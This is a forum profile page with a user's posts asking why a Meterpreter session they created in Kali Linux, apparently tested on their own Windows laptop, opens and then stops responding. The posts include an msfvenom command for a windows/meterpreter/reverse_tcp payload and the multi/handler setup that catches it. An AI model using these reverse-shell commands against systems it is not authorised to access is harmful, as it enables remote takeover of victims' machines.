Jump to content

Tato

Active Members
  • Posts

    6
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Tato's Achievements

Newbie

Newbie (1/14)

  1. No Nothing happen when i try list file or something else. Maybe i have to uninstall metasploit and the install it again.
  2. is listed all the sessions but when i set the session 1(the meterpreter session) nothing happen
  3. maybe i have to reinstall it?
  4. I try for a long time but didn't work
  5. Hey guys I have a problem that is bothering me for a long time now.I can't execute a meterpreter shell that I created in Kali Linux I click it and nothing happens.The code I used at the start was (msfvenom -p windows/meterpreter/reverse_tcp LHOST=my ip LPORT=4444..etc and when I launched it on my laptop (windows 8.1) say (We are in the same network): [*] Sending stage (179267 bytes) to (victim ip) [*] Meterpreter session 1 opened ((my ip):4444 -> (victim ip) :63938) at 2017-09-30 18:44:30 +0200 and does nothing more. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST... set LPORT... exploit If you guys know what the problems is please reply because I don't seem to find it.Thank you in advance.
×
×
  • Create New...